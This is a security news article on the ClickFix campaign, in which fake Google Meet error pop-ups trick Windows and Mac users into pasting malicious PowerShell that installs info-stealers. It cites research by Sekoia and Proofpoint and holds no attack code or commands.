Windows and Mac users are being targeted by a new social engineering campaign, ClickFix, that uses fake Google Meet landings for planting info-stealing malware onto victim systems.
According to a research by the French cybersecurity company Sekoia, the campaign is a ClearFake variant, first observed in May 2024, that abuses PowerShell and Clipboard.
“This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems,” Sekoia said in the research.
Proofpoint, the cybersecurity company credited with naming the tactic, had reported in June that the tactic is being increasingly used by threat actors, including the initial access broker TA571, to deliver malware like DarkGate, Matanbuchus, NetSupport, and various information stealers.
Faking Google Meet Conference errors
In the instances observed by Sekoia, threat actors were found using websites masquerading as the homepage of a Google Meet video conference. The sites displayed pop-up windows falsely indicating problems with the microphone and headset, Sekoia added.
The pop-up windows planted by the miscreants prompted users to fix the problems by pressing a combination of keys which ultimately resulted in the victims copying and pasting the malware code and running it on the command prompt.
“Sekoia analysts successfully associated this cluster impersonating Google Meet with two cybercrime groups: ‘Slavic Nation Empire (SNE)’ and ‘Scamquerteo,’” Sekoia said. “These groups are sub-teams of the cryptocurrency scam teams ‘Marko Polo’ and ‘CryptoLove,’ respectively.”
Sekoia, in a blog post detailing the technicalities of the campaign, listed all the domain names and IP addresses it observed in connections with the campaign cluster using the fake Google Meet web pages. Additionally, it shared the URL samples used to imitate legitimate Google Meet landings.
Increased activity with sophisticated payload delivery
Sekoia said the threat actors dropped separate malware on the Windows and MacOS systems. Windows users were targeted with Stealc and Rhadamanthys, while Mac users were infected by AMOS stealer, the blog noted.
The campaign seems to be on the rise with several independent threat researchers reporting on its activities. Variations of ClickFix campaign, including ClearFake and OneDrive Pastejacking, have been reported frequently in recent times.
“ClickFix is an emerging social engineering tactic first observed in 2024,” Sekoia said. “As of September 2024, several intrusion sets already adopted it to widely distribute malware through email phishing campaigns, compromised websites, and distribution infrastructures.”
While such momentum of the tactic is a subject of concern, the significant user interaction these types of attacks need to be successful presents some hope. Aggressive enterprise training to identify and report these attempts should allow for an effective handling of such threats.